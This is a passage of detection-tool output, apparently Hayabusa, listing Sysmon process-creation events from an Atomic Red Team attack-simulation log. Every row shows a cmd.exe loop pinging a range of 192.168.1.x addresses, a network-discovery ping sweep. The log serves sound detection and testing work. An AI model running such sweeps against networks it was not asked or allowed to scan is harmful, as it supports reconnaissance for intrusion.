-n 1 -w 100 192.168.1.32 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.33 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.34 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.35 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.36 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.019 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.37 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.38 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.39 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.40 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.41 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.42 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.43 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.44 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.45 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.46 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.47 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.48 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.49 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.537 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.50 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.51 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.52 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.53 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.54 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.55 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.56 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.57 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.58 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.59 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.60 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.61 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.62 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.019 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.63 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.64 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.65 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.66 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.67 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.68 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.69 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.70 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.71 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.72 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.73 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.74 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.75 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.547 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.76 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.77 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.78 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.79 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.80 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.81 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.82 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.83 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.84 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.85 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.86 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.87 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 